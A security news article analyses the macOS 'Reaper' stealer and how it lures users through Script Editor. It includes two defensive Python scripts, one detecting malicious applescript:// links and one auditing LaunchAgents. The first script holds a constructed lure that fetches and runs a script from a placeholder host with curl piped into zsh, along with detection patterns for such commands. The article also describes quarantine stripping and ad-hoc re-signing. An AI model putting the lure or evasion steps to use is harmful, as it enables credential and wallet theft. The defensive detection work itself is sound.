The Script Editor Trap: New macOS “Reaper” Malware Bypasses Terminal Defenses to Steal Keychains

A new macOS lure has surfaced that deceives users with a counterfeit "security update." The payload, tracked as Reaper, an updated build of the SHub information stealer, no longer coaxes victims into pasting commands into the Terminal. Instead, it opens Apple's own Script Editor with the malicious AppleScript already loaded, so the social engineering is reduced to a single click.

Researchers at SentinelOne report that Reaper harvests browser data, searches for documents likely to contain financial information, targets cryptocurrency wallets, and opens a backdoor on the infected host. The malware abuses the applescript:// URL scheme to launch Script Editor with an AppleScript payload in place. If the victim clicks "Run," the script displays a fake Apple update prompt, downloads a second-stage script with curl, and runs it under zsh.

The technique sidesteps the mitigation Apple shipped in late March in macOS Tahoe 26.4. That update made it harder to paste and run dangerous commands in Terminal, but Reaper moves the same lure to a different built-in, trusted utility that the Terminal change does not cover.
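To make the lure concrete from the defender's side, here is an added example (not SentinelOne's or the article's code) that pulls the embedded AppleScript out of an applescript:// link and flags the traits described above: shelling out, fetching remote code with curl, and piping it into zsh. It assumes Script Editor's handler takes the form applescript://com.apple.scripteditor?action=new&script=<url-encoded source>; the URLs, HTML snippet and script text below are constructed for the example, and example.invalid is a non-resolving host.

```python
"""Flag applescript:// links that hand a user a pre-loaded Script Editor payload.

Added example, not code from SentinelOne or from the article. Assumption: the
Script Editor URL handler has the form
    applescript://com.apple.scripteditor?action=new&script=<url-encoded source>
All URLs, HTML and script text below are constructed for this example.
"""
import html
import re
from urllib.parse import quote, urlsplit, parse_qs

# Traits of the lure described above. Matching is done on the decoded AppleScript.
SUSPICIOUS = {
    "shell_exec":      re.compile(r"do shell script", re.I),          # AppleScript -> shell
    "remote_fetch":    re.compile(r"\b(curl|wget)\b", re.I),          # pulls a second stage
    "pipe_to_shell":   re.compile(r"\|\s*(zsh|bash|sh)\b", re.I),     # runs it without a file on disk
    "password_prompt": re.compile(r"with hidden answer", re.I),       # dialog asking for a password
    "obfuscation":     re.compile(r"base64|\\u00[0-9a-f]{2}", re.I),  # hides the real command
}

LINK_RX = re.compile(r"applescript://[^\s\"'<>]+", re.I)


def extract_script(url):
    """Return the AppleScript embedded in an applescript:// URL, or None."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "applescript":
        return None
    # parse_qs already percent-decodes the value, so no second unquote here
    script = parse_qs(parts.query).get("script")
    return script[0] if script else None


def classify(url):
    """Return the decoded script, the matched traits and a verdict for one URL."""
    script = extract_script(url)
    if script is None:
        return {"script": None, "hits": [], "verdict": "not-applescript"}
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(script)]
    return {"script": script, "hits": hits, "verdict": "suspicious" if hits else "benign"}


def find_links(text):
    """Pull applescript:// links out of HTML or plain text (e.g. a fetched phishing page)."""
    return LINK_RX.findall(html.unescape(text))


# Constructed samples: the lure pattern from the article (fake update dialog,
# curl piped into zsh), a harmless script, and a page embedding the lure.
LURE_SCRIPT = (
    'display dialog "Apple Security Update required" buttons {"Update"}\n'
    'do shell script "curl -fsSL https://example.invalid/update.sh | zsh"'
)
SAMPLES = {
    "lure":   "applescript://com.apple.scripteditor?action=new&script=" + quote(LURE_SCRIPT),
    "benign": "applescript://com.apple.scripteditor?action=new&script=" + quote('say "hello"'),
    "http":   "https://example.invalid/page",
}
SAMPLE_HTML = '<a href="' + SAMPLES["lure"].replace("&", "&amp;") + '">Update now</a>'

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        r = classify(url)
        print(f"{name:7s} {r['verdict']:15s} {r['hits']}")
    for link in find_links(SAMPLE_HTML):
        print("embedded link:", classify(link)["verdict"])
```

The same classifier can sit in a mail gateway or web proxy that already has the page body; a hit on pipe_to_shell or remote_fetch inside a script a website wants the user to "Run" is reason enough to block the link rather than rely on the user reading the dialog.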

Victims were lured with trojanized installers for WeChat and Miro hosted on lookalike phishing domains, including qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com. Before serving the payload, the sites fingerprinted the visitor's machine, checking for virtual-machine artifacts and active VPN connections and enumerating browser extensions for password managers and cryptocurrency wallets. The collected fingerprint was sent to the operators through a Telegram bot.

Before stealing anything, Reaper checks whether a Russian keyboard layout is configured. If it is, the malware sends a cis_blocked event to its command-and-control (C2) server and exits without touching the system, consistent with operators who avoid victims in CIS countries.

If the check passes, Reaper prompts the user for the macOS login password. With that password it can unlock the Keychain, locally stored credentials, and encrypted files. It then harvests data from Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion, and targets extensions including MetaMask, Phantom, 1Password, Bitwarden, and LastPass. Desktop wallets such as Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite are also targeted, and Reaper attempts to collect iCloud sync data, active Telegram session files, and configuration files from software development tools.

A separate Filegrabber module searches the Desktop and Documents folders for files likely to contain sensitive information. It takes ordinary files up to 2 MB and PNG images up to 6 MB, and caps the total at 150 MB so the upload stays inconspicuous.

When it finds a targeted cryptocurrency wallet, Reaper kills the running process and replaces the application's app.asar (the archive that holds an Electron app's JavaScript, so this step applies to the Electron-based wallets) with a trojanized copy fetched from the C2 server. To avoid a Gatekeeper warning on the next launch, it strips the extended attributes, including the com.apple.quarantine flag, with xattr -cr and re-signs the modified bundle with an ad-hoc signature. An ad-hoc signature carries no developer identity, so a wallet bundle whose codesign -dv --verbose=2 output reports Signature=adhoc where a Developer ID certificate is expected is a quick sign of tampering.

Reaper also sets up persistence. It installs a script disguised as a Google software update and registers it as a LaunchAgent that runs every minute, reporting system information to the C2 server and waiting for further payloads. The original dropper then deletes itself, leaving the operators with quiet, long-term access to the machine.

SentinelOne's analysts warn that SHub's developers are steadily extending the stealer toward a full remote access trojan (RAT). Defenders should watch for unexpected outbound connections shortly after Script Editor is launched, and review new LaunchAgents and any files posing as components of trusted vendors' software.
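As an added example (not SentinelOne's or the article's code) of the LaunchAgent audit the last two paragraphs call for, the script below scores agent plists on the traits of the persistence described above: a program wrapped in a shell or osascript, a hidden path component under the user's home, a StartInterval of a few minutes or less, and a label that imitates a vendor. The two plists are constructed; the vendor prefixes, interval threshold and weights are heuristics for the example rather than vendor signatures.

```python
"""Audit LaunchAgent plists for the persistence pattern described above:
a frequently firing agent whose label imitates a trusted vendor but whose
program is a script in a user-writable, often hidden, path.

Added example, not code from SentinelOne or from the article. The plists
below are constructed; the vendor prefixes, interval threshold and weights
are heuristics chosen for the example, not vendor signatures.
"""
import plistlib
from pathlib import Path, PurePosixPath

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
SCRIPT_EXT = {".sh", ".zsh", ".py", ".scpt", ".applescript", ".js"}
VENDOR_PREFIXES = ("com.google.", "com.apple.", "com.microsoft.", "com.adobe.")
INTERVAL_THRESHOLD = 300   # seconds; the agent described above fires every 60
SUSPICION_THRESHOLD = 4    # sum of the weights assigned below


def program_path(plist):
    """Return (path launchd effectively runs, wrapped_by_interpreter).

    For ["/bin/zsh", "/Users/x/.hidden/update.sh"] the interesting path is the
    script, not the shell, so the first non-flag argument is returned."""
    args = plist.get("ProgramArguments") or []
    exe = plist.get("Program") or (args[0] if args else None)
    if exe is None:
        return None, False
    wrapped = PurePosixPath(exe).name in INTERPRETERS
    if wrapped:
        for arg in args[1:]:
            if not arg.startswith("-"):
                return arg, True
    return exe, wrapped


def audit(plist_bytes):
    """Score one plist. A genuine vendor updater points at a Mach-O inside its
    own bundle and runs rarely, so it collects at most the label weight."""
    plist = plistlib.loads(plist_bytes)
    label = plist.get("Label", "")
    path, wrapped = program_path(plist)
    findings = {}
    if wrapped:
        findings["interpreter_wrapped"] = 2
    if path:
        p = PurePosixPath(path)
        if p.suffix.lower() in SCRIPT_EXT:
            findings["script_program"] = 1
        if any(part.startswith(".") for part in p.parts):
            findings["hidden_path_component"] = 2
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= INTERVAL_THRESHOLD:
        findings["short_interval"] = 1
    if label.startswith(VENDOR_PREFIXES):
        findings["vendor_like_label"] = 1   # only meaningful together with the rest
    score = sum(findings.values())
    return {"label": label, "program": path, "findings": sorted(findings),
            "score": score, "verdict": "suspicious" if score >= SUSPICION_THRESHOLD else "benign"}


def audit_directory(directory):
    """Audit every plist in a LaunchAgents folder, e.g. ~/Library/LaunchAgents."""
    results = []
    for f in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            results.append({"file": str(f), **audit(f.read_bytes())})
        except Exception as exc:   # an unparseable agent deserves a look too
            results.append({"file": str(f), "error": str(exc), "verdict": "unparseable"})
    return results


# Constructed samples, serialised the way launchd stores them.
SAMPLES = {
    # Shaped like the Reaper agent: vendor-style label, shell-wrapped script in a
    # hidden folder under the user's home, fires every minute.
    "reaper_like": plistlib.dumps({
        "Label": "com.google.keystone.agent",
        "ProgramArguments": ["/bin/zsh", "/Users/alice/Library/Application Support/.google/update.sh"],
        "StartInterval": 60,
    }),
    # Shaped like a real updater entry: same label style, but a Mach-O inside a
    # bundle and an interval of roughly an hour.
    "updater_like": plistlib.dumps({
        "Label": "com.google.keystone.agent",
        "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent", "-runMode", "ifneeded"],
        "StartInterval": 3523,
    }),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        r = audit(data)
        print(f"{name:13s} {r['verdict']:10s} score={r['score']} {r['findings']}")
    # On a Mac: for r in audit_directory("~/Library/LaunchAgents"): print(r)
```

The scoring deliberately gives the vendor-like label only one point: legitimate updaters use exactly such labels, and what separates the Reaper agent from them is the combination of a script, a hidden directory and a one-minute interval. Run audit_directory over ~/Library/LaunchAgents for every user and over /Library/LaunchAgents, and treat any program path you cannot tie to an installed, signed bundle as worth pulling for analysis.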
